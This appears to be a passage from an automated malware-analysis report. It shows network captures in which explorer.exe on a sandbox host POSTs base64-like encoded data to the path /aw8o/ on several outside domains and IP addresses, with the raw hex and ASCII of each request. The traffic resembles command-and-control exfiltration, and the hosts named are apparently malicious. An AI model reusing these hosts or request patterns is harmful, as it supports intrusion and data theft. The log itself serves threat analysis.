                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 5a 6e 32 4d 43 46 6f 57 2b 48 69 38 57 67 45 56 48 69 4e 62 66 34 38 77 78 44 30 48 75 43 46 58 56 6d 4e 45 4f 2f 4b 2f 53 51 58 4a 65 69 2f 66 48 2f 64 77 56 74 71 32 59 36 7a 4a 66 55 52 6e 54 6e 2f 68 53 67 2f 4c 71 42 52 63 77 49 65 4a 67 47 58 45 79 71 74 41 5a 59 67 51 56 51 37 68 6e 33 32 6b 50 6e 2b 66 37 41 61 48 58 65 42 4d 72 37 49 65 6a 66 72 79 2f 31 77 58 52 41 65 58 38 57 39 4f 33 33 63 69 44 6f 63 73 7a 39 6e 48 32 70 77 65 2f 73 4a 72 47 66 49 33 30 6c 6c 59 48 76 6f 71 77 49 34 74 65 57 45 4c 38 6e 4e 61 61 30 51 59 47 7a 4a 74 51 4a 6b 46 32 4c 53 30 72 38 51 54 58 79 42 43 56 61 6c 75 70 45 6c 34 6a 49 6c 6b 5a 72 77 4a 31 2b 55 38 38 6c 62 33 30 68 65 59 6e 4e 4a 31 31 6d 54 70 34 79 76 50 54 71 6c 35 32 46 49 76 58 57 4f 55 59 4c 57 66 30 79 4a 52 65 36 6e 72 78 57 59 36 51 69 56 4b 4f 4d 51 32 52 32 54 43 39 43 77 63 38 73 35 7a 68 39 46 78 42 46 34 41 6f 7a 68 42 72 59 67 2f 76 51 50 4c 31 54 31 4b 6a 32 48 4d 52 37 70 57 6d 50 53 66 55 4c 53 65 34 78 62 6a 6e 77 46 6b 6b 39 30 6b 7a 66 57 34 6d 77 35 65 58 32 69 5a 2f 55 78 63 54 33 61 6e 34 4a 65 37 58 65 6d 69 68 35 4d 70 34 68 76 33 2f 72 49 48 52 53 77 49 4c 6a 2f 2b 71 6d 59 6d 38 30 4b 2f 69 43 43 70 52 77 7a 6f 72 59 47 4b 36 71 5a 78 69 2b 49 50 62 79 54 72 31 4b 66 76 43 4f 4c 4e 73 69 4e 56 39 47 46 61 2b 32 64 47 34 74 64 72 59 2f 64 78 49 55 6b 37 6c 4f 4e 7a 34 2f 76 6f 66 5a 50 64 6a 56 61 68 6f 39 72 42 38 33 6d 78 71 69 74 66 4a 64 77 6f 32 47 50 4b 54 53 76 2f 4c 37 37 52 7a 74 36 43 57 65 70 76 30 4f 55 32 6c 69 6e 68 64 39 56 72 37 54 6f 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=Zn2MCFoW+Hi8WgEVHiNbf48wxD0HuCFXVmNEO/K/SQXJei/fH/dwVtq2Y6zJfURnTn/hSg/LqBRcwIeJgGXEyqtAZYgQVQ7hn32kPn+f7AaHXeBMr7Iejfry/1wXRAeX8W9O33ciDocsz9nH2pwe/sJrGfI30llYHvoqwI4teWEL8nNaa0QYGzJtQJkF2LS0r8QTXyBCValupEl4jIlkZrwJ1+U88lb30heYnNJ11mTp4yvPTql52FIvXWOUYLWf0yJRe6nrxWY6QiVKOMQ2R2TC9Cwc8s5zh9FxBF4AozhBrYg/vQPL1T1Kj2HMR7pWmPSfULSe4xbjnwFkk90kzfW4mw5eX2iZ/UxcT3an4Je7Xemih5Mp4hv3/rIHRSwILj/+qmYm80K/iCCpRwzorYGK6qZxi+IPbyTr1KfvCOLNsiNV9GFa+2dG4tdrY/dxIUk7lONz4/vofZPdjVaho9rB83mxqitfJdwo2GPKTSv/L77Rzt6CWepv0OU2linhd9Vr7To=
                                                                                                                                                                                          Aug 10, 2023 10:20:39.331764936 CEST1129INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:39 GMT
                                                                                                                                                                                          Content-Length: 18
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                                                                                          Data Ascii: 404 page not found


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          33192.168.11.204974843.154.67.17080C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:41.856244087 CEST1134OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.fgnvcmef.click
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.fgnvcmef.click
                                                                                                                                                                                          Referer: http://www.fgnvcmef.click/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 52914
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 5a 6e 32 4d 43 46 6f 57 2b 48 69 38 57 67 45 56 48 69 4e 62 66 34 38 77 78 44 30 48 75 43 46 58 56 6d 4e 45 4f 2f 4b 2f 53 51 66 4a 64 55 72 66 48 63 31 77 55 74 71 32 48 4b 7a 4d 66 55 52 2b 54 6e 6e 6c 53 67 69 30 71 44 5a 63 31 50 43 4a 67 30 50 45 33 71 74 42 48 49 67 6f 52 51 36 32 6e 33 4c 39 50 6d 61 6c 37 56 4f 48 5a 2b 78 4d 34 34 67 42 67 50 72 30 2f 31 77 68 62 51 65 66 38 57 70 34 33 33 59 69 44 71 6f 73 68 2f 50 48 78 36 6f 65 6b 73 4a 6f 50 2f 4a 33 36 46 6b 6d 48 75 4e 62 77 49 34 62 65 54 6b 4c 38 68 4e 61 5a 33 6f 66 48 54 4a 74 64 70 6b 47 39 72 65 4b 72 36 31 4d 58 7a 31 43 56 5a 6c 75 6f 6b 6c 34 6c 73 78 6c 55 62 77 44 78 2b 55 76 34 6c 6e 2f 30 6e 79 6d 6e 4e 64 31 79 57 58 70 34 42 33 50 51 4c 6c 35 2f 46 49 70 54 57 4f 68 4b 4c 57 54 30 78 67 74 65 37 48 42 78 55 55 36 52 44 31 4b 46 4f 6f 31 52 57 54 41 78 69 78 62 33 4d 46 76 68 39 55 67 42 46 34 51 6f 78 4e 42 6f 6f 51 2f 75 52 50 55 32 44 31 51 6f 57 48 56 62 62 6c 49 6d 50 4f 48 55 4c 37 47 34 79 33 6a 6c 51 46 6b 67 61 6f 6a 6b 2f 57 46 76 51 34 48 61 57 6a 50 2f 55 39 78 54 32 75 64 34 36 61 37 47 2b 57 69 72 4a 4d 75 38 42 76 37 78 4c 49 4a 56 53 77 49 4c 6a 79 48 71 6d 55 6d 38 46 69 2f 77 6c 75 70 53 58 66 6f 34 49 47 49 36 71 59 71 69 2b 56 7a 62 79 62 56 31 4b 50 42 43 49 54 4e 69 58 52 56 36 45 39 5a 31 57 64 48 38 74 63 39 46 71 45 7a 49 55 49 7a 6c 4f 39 6a 37 4e 62 6f 63 59 2f 64 68 6c 61 67 73 64 72 4b 73 48 6e 71 75 69 70 71 4a 64 64 54 32 48 72 6a 54 52 66 2f 49 74 75 37 32 4e 36 6d 49 63 74 51 39 36 39 6e 71 42 76 41 47 65 52 58 6d 31 66 32 50 37 4c 44 4e 46 36 76 37 4c 46 63 43 78 78 48 53 7a 6a 33 44 53 57 4d 59 61 5a 7a 2f 33 43 68 49 2b 68 32 2f 35 64 67 4e 6b 32 7a 6b 4d 46 36 34 61 4a 33 39 35 4b 30 5a 71 61 7a 6f 4d 68 47 64 45 2b 4c 67 53 50 70 7a 5a 44 62 63 2f 52 45 76 62 71 67 43 6f 32 54 33 6a 54 6e 54 6f 76 71 7a 74 70 4e 75 34 6d 74 5a 43 38 6a 39 64 49 75 43 4e 6e 55 43 70 46 69 42 35 4d 7a 54 51 52 59 34 49 51 68 31 4b 41 66 33 6c 42 7a 30 59 39 48 6f 6c 50 49 64 6d 72 33 57 7a 48 4d 55 53 32 74 77 6f 6f 6b 46 58 4b 2b 65 79 64 47 46 55 30 50 46 5a 74 63 48 78 6b 63 51 61 56 4e 58 4f 2b 33 35 6c 39 45 78 72 58 76 69 34 45 45 50 68 2f 44 78 37 5a 4a 43 72 45 6a 62 73 73 71 74 31 70 51 33 4a 45 61 34 72 30 64 4a 48 37 37 5a 6f 67 46 62 48 59 55 4a 2b 50 77 47 36 37 68 45 42 77 76 72 48 39 69 59 46 2f 63 4a 61 6e 45 5a 72 45 4a 4a 50 47 6b 63 2f 54 35 41 4c 74 4c 47 58 73 51 69 73 4b 75 4f 6e 51 6a 34 43 64 6a 58 57 52 48 62 4b 55 78 76 33 4d 45 56 4e 30 4e 52 36 47 6c 44 37 5a 58 34 35 78 62 58 34 7a 73 74 4e 75 69 52 30 6d 6a 35 63 6b 56 52 58 7a 42 75 71 6a 55 48 4f 6a 32 33 62 71 6d 5a 79 70 45 70 73 46 57 55 56 33 69 4e 46 34 4c 57 6a 73 56 36 45 70 55 4a 4d 6f 43 79 46 73 73 53 70 34 6c 74 43 62 39 5a 68 33 6b 30 6d 4c 4a 34 4c 42 63 36 6b 65 52 36 6e 79 56 48 4d 2b 35 64 6b 63 6e 32 68 36 39 33 75 32 45 5a 4c 4b 43 44 46 4e 52 4d 65 59 48 6c 74 63 41 4d 44 2b 36 48 58 47 6f 31 6d 47 78 48 34 44 2f 5a 68 78 6d 50 33 74 7a 34 68 62 57 55 36 79 70 66 66 74 74 77 65 79 55 6f 39 73 66 63 6f 64 36 38 43 37 73 4d 78 4e 33 4d 47 71 39 44 4d 77 65 56 32 69 43 48 2f 4f 76 48 36 2f 63 4b 71 38 52 71 65 61 43 57 47 4b 6b 51 38 6d 52 41 6d 77 77 6c 61 48 65 4a 33 78 6d 2f 30 33 39 38 35 59 6e 79 4e 6e 6a 65 71 67 2b 75 66 53 6a 5a 57 36 69 33 35 73 67 47 5a 78 4e 34 48 75 64 30 64 4b 36 62 56 79 73 6e 7a 69 62 59 79 49 49 33 72 64 44 59 58 69 50 64 6e 43 63 74 6c 57 41 38 39 6d 49 6f 4e 4c 6f 68 56 61 57 39 53 79 36 59 62 76 45 2b 72 6b 39 52 39 34 69 2b 47 54 68 5a 68 4a 67 67 39 4c 73 54 31 49 75 59 7a 4a 31 65 30 42 61 65 5a 32 37 59 79 49 34 79 68 54 75 74 6a 2f 79 67 74 48 68 70 62 70 51 42 46 4a 2f 30 79 6a 31 6d 77 71 36 38 30 53 44 36 78 6e 71 62 4a 70 4e 54 54 4a 46 53 73 70 76 36 50 31 51 57 31 61 33 5a 6d 35 6b 42 49 56 54 69 61 54 39 74 77 6f 77 5a 49 4a 74 52 6e 4e 4b 6c 48 30 48 35 42 4e 58 4d 62 70 44 34 38 73 6d 6d 31 44 4a 32 63 69 6f 6e 73 54 58 74 38 4e 4e 70 58 6e 35 47 56 31 48 65 43 33 75 32 4e 46 36 45 69 43 4c 54 38 30 54 31 5a 70 37 73 55 63 53 58 69 59 6c 35 66 77 59 7a
                                                                                                                                                                                          Data Ascii: 1NM6e=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
                                                                                                                                                                                          Aug 10, 2023 10:20:41.856267929 CEST1139OUTData Raw: 48 74 57 34 49 31 4f 68 71 4f 50 37 58 61 76 59 33 39 63 6e 37 30 56 4b 54 67 30 79 50 4f 4d 4d 43 61 70 4c 70 50 30 72 56 53 49 47 4d 49 6d 65 30 6f 4c 73 46 31 4a 4a 2f 6b 2f 64 58 77 6f 75 4b 4b 56 6c 70 38 34 4f 2f 43 55 6b 44 5a 51 76 6a 77
                                                                                                                                                                                          Data Ascii: HtW4I1OhqOP7XavY39cn70VKTg0yPOMMCapLpP0rVSIGMIme0oLsF1JJ/k/dXwouKKVlp84O/CUkDZQvjww9Mz/EsNvxsDnu58QiCG3a27kcZq0M244s3VXcJgqidi86sms4l5//htpTykFLvxI6YQjSBVRGoGSVD+SvPbi8A/HSucw7YR5TQVPGj110s1MFl0eTcrp9mOHPe6aVQQCEaRqy9cyW91fhV0TB+lSjcyT+Jzjq+Hy
                                                                                                                                                                                          Aug 10, 2023 10:20:41.856313944 CEST1142OUTData Raw: 36 4b 65 42 41 4d 6e 67 57 6a 44 49 32 6f 70 47 6b 4a 2b 2b 75 4c 68 41 5a 61 58 4a 33 79 50 72 4e 32 35 50 6e 74 59 4b 38 63 64 4e 74 37 4b 53 5a 58 4c 63 58 55 34 64 72 59 43 39 44 6b 57 34 7a 6d 36 6c 6e 39 64 4b 59 62 4c 74 70 33 6c 4b 35 56
                                                                                                                                                                                          Data Ascii: 6KeBAMngWjDI2opGkJ++uLhAZaXJ3yPrN25PntYK8cdNt7KSZXLcXU4drYC9DkW4zm6ln9dKYbLtp3lK5VRfPFQz6zEHBHjMhLldp6HODpR1JRzTJM2D6v6ku4SXL9yTWY3Q+boV/g2A9agQdAdmcKX8tJot0mcbUktQl2CkukAuSeKkHael3v2rnlN5HZNwuJhVhMQrmWupPasSvQ4XfQ7G1spK6ULpbKy+mB3OS6o5qfNFXXi
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112663031 CEST1145OUTData Raw: 37 4e 59 6d 6b 57 79 4e 34 77 69 6e 43 4e 63 33 37 6f 59 66 71 58 54 64 4d 6c 4e 37 71 2b 54 32 71 35 54 78 48 66 39 71 69 51 70 41 63 4f 73 44 49 61 4d 50 49 6d 53 36 67 4f 6b 5a 59 70 42 55 6b 42 41 6e 68 65 55 4c 71 58 47 4f 4a 74 61 31 6c 4b
                                                                                                                                                                                          Data Ascii: 7NYmkWyN4winCNc37oYfqXTdMlN7q+T2q5TxHf9qiQpAcOsDIaMPImS6gOkZYpBUkBAnheULqXGOJta1lK7jWh7h6Dk1iEWR5E/yq0MdXlDZk7Suyua4cMCtrCj+jOFeix7iN5Rjm7PDLlLQLZrlPhew7DdSju0z46h2I9jY0BCDTbtbgOkZkjn3lhDGH3NckePbvCg4Lflf+SVFNwETMsZd3gA0xo/gwBIO7ThmUE7gpe+1S0i
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112725019 CEST1145INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:42 GMT
                                                                                                                                                                                          Content-Length: 18
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                                                                                          Data Ascii: 404 page not found
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112842083 CEST1154OUTData Raw: 37 37 73 63 46 32 64 55 70 65 78 2f 54 57 30 7a 41 50 41 62 54 51 43 71 36 73 34 5a 72 6d 46 2f 4a 30 63 6d 44 32 49 45 5a 68 4d 48 51 44 4c 73 47 69 56 66 59 64 38 61 44 45 50 62 38 77 44 32 70 52 4a 61 6b 39 78 6b 51 74 56 65 34 77 2b 63 33 31
                                                                                                                                                                                          Data Ascii: 77scF2dUpex/TW0zAPAbTQCq6s4ZrmF/J0cmD2IEZhMHQDLsGiVfYd8aDEPb8wD2pRJak9xkQtVe4w+c31zS+N9MMbyMRygqpcQk711HRZ1q9J+1Ncpc5645oj8fbSvkYJU8lQgwKeEMpW3UvbF0qVzjexY0MT2BMjx5IH3/Ug9/OhBtRnPCxQ2WRuyfbpElnQEWyQA7BT/Vkk0mBhnEbYHZxZfrFxvLa+HUp4WqngoYHSyjLHU
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112989902 CEST1155OUTData Raw: 66 53 2f 79 43 31 34 63 59 54 58 6f 2f 35 4d 43 38 45 7a 74 44 67 2f 35 46 44 47 46 53 30 6a 75 74 69 52 65 34 50 55 49 48 57 32 5a 47 36 71 2b 6d 6c 4c 78 46 4d 43 32 45 65 76 78 4c 55 72 79 79 6c 59 51 6a 75 65 58 58 35 4f 49 64 37 5a 75 61 74
                                                                                                                                                                                          Data Ascii: fS/yC14cYTXo/5MC8EztDg/5FDGFS0jutiRe4PUIHW2ZG6q+mlLxFMC2EevxLUryylYQjueXX5OId7Zuat5qg4dnJnS+JF2s53io4zEtNX5wJyt8gsRiHrZzOk/IEPrw8rDm/Gw302Omy4H55xvUjx2JwWO2zAYGHbDi9wYEanSPfbSJbFEU0BOMgX6kjqA3+fnE5RgVofiBrjui8wfEv50hGmxja/4rf9UacKO2rfxLDUuOxJy
                                                                                                                                                                                          Aug 10, 2023 10:20:42.113162041 CEST1158OUTData Raw: 37 35 4e 4a 78 4d 6c 67 6a 78 50 71 74 71 54 66 47 6f 6d 65 67 50 46 72 64 5a 75 41 31 6a 45 47 39 4d 68 7a 46 79 76 78 65 52 62 6e 2b 48 56 42 44 65 45 36 57 70 30 5a 54 68 66 39 52 34 34 42 45 47 38 6c 66 57 69 62 7a 2b 68 6f 39 4a 63 48 74 30
                                                                                                                                                                                          Data Ascii: 75NJxMlgjxPqtqTfGomegPFrdZuA1jEG9MhzFyvxeRbn+HVBDeE6Wp0ZThf9R44BEG8lfWibz+ho9JcHt0fOAvfbFFiuV3y78dco8Wd0FULc3YPKPJxDaf6Vc51oo+sVYVcvsr7yLi7ieZEeFwLrq8JBVdzCl8zU5P299INq6jByFVHV9ukitNwqliV5Jlt0lnOHh429izOYLXIjha1ghYkFZHgH9h7mIeUSx14DMCvJF9kZ5Q7


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          4192.168.11.204971996.44.182.13180C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:01.344804049 CEST277OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.handsome-sex.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.handsome-sex.com
                                                                                                                                                                                          Referer: http://www.handsome-sex.com/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 526
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 77 78 6d 35 47 4f 41 34 65 4e 6b 78 67 4f 70 62 58 6d 69 58 4c 34 38 47 70 6f 49 6c 65 57 41 61 7a 61 45 75 7a 69 33 6f 53 62 42 7a 6e 4b 36 58 2f 32 32 5a 79 6a 66 61 4a 44 73 34 4d 4e 68 4f 59 58 6d 61 5a 4a 50 4f 78 34 65 66 41 43 47 55 4a 4f 52 79 44 37 38 54 46 39 43 45 76 32 43 67 74 56 34 56 61 37 58 72 50 55 37 47 7a 43 54 65 76 2b 39 79 39 74 49 58 62 6a 70 4c 65 37 50 4d 4f 6b 51 7a 70 6d 4d 6b 44 43 6c 38 56 58 77 66 68 42 39 69 54 6b 32 42 71 6b 33 6e 30 44 63 33 36 79 63 69 73 69 74 38 78 70 39 50 34 68 31 6a 59 71 5a 35 74 53 5a 6c 55 35 72 71 4c 61 73 66 65 58 63 4a 65 6d 62 36 55 69 58 4e 66 45 45 6c 53 42 35 38 2f 2f 45 49 35 4d 4a 50 79 4a 64 71 6d 62 54 31 52 30 6a 56 48 41 54 58 32 65 33 77 4a 6d 52 62 4b 45 75 62 2f 75 48 63 50 35 70 6c 6f 6f 38 6a 71 51 47 69 44 52 68 63 57 38 78 65 4e 72 38 62 70 67 64 6a 62 74 53 79 65 39 34 77 58 55 6d 38 35 2b 65 36 68 63 66 47 45 6a 6d 2f 54 61 62 61 6e 73 66 43 76 46 69 63 54 77 4c 64 2b 43 36 65 6e 2f 79 43 74 30 46 37 66 36 48 49 32 6b 4a 46 6d 4c 45 44 35 5a 6e 7a 36 6b 70 75 6f 39 43 71 79 53 66 31 6e 68 56 6b 75 34 41 49 37 57 47 31 75 37 57 36 33 5a 4d 6d 51 4d 31 68 4d 39 6d 54 44 31 77 64 46 63 5a 4a 73 47 4d 47 6e 57 4a 56 41 45 49 48 31 6c 35 53 73 67 32 4e 39 7a 6c 70 57 61 49 74 54 39 2b 45 43 58 75 30 45 57 63 4f 78 57 4f 39 47 4f 4a 30 66 6d 65 33 43 35 64 2f 46 61 33 57 74 38 42 46 4a 6c 44 5a 4e 32 78 4a 59 4f 6b 6b 36 63 7a 4e 4e 4b 6c 77 6e 6d 34 63 69 50 4c 61 59 4f 64 57 61 6a 59 2b 47 70 64 62 45 4c 6a 4a 36 43 38 74 4e 34 6f 49 4d 57 50 69 51 44 77 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=wxm5GOA4eNkxgOpbXmiXL48GpoIleWAazaEuzi3oSbBznK6X/22ZyjfaJDs4MNhOYXmaZJPOx4efACGUJORyD78TF9CEv2CgtV4Va7XrPU7GzCTev+9y9tIXbjpLe7PMOkQzpmMkDCl8VXwfhB9iTk2Bqk3n0Dc36ycisit8xp9P4h1jYqZ5tSZlU5rqLasfeXcJemb6UiXNfEElSB58//EI5MJPyJdqmbT1R0jVHATX2e3wJmRbKEub/uHcP5ploo8jqQGiDRhcW8xeNr8bpgdjbtSye94wXUm85+e6hcfGEjm/TabansfCvFicTwLd+C6en/yCt0F7f6HI2kJFmLED5Znz6kpuo9CqySf1nhVku4AI7WG1u7W63ZMmQM1hM9mTD1wdFcZJsGMGnWJVAEIH1l5Ssg2N9zlpWaItT9+ECXu0EWcOxWO9GOJ0fme3C5d/Fa3Wt8BFJlDZN2xJYOkk6czNNKlwnm4ciPLaYOdWajY+GpdbELjJ6C8tN4oIMWPiQDw=
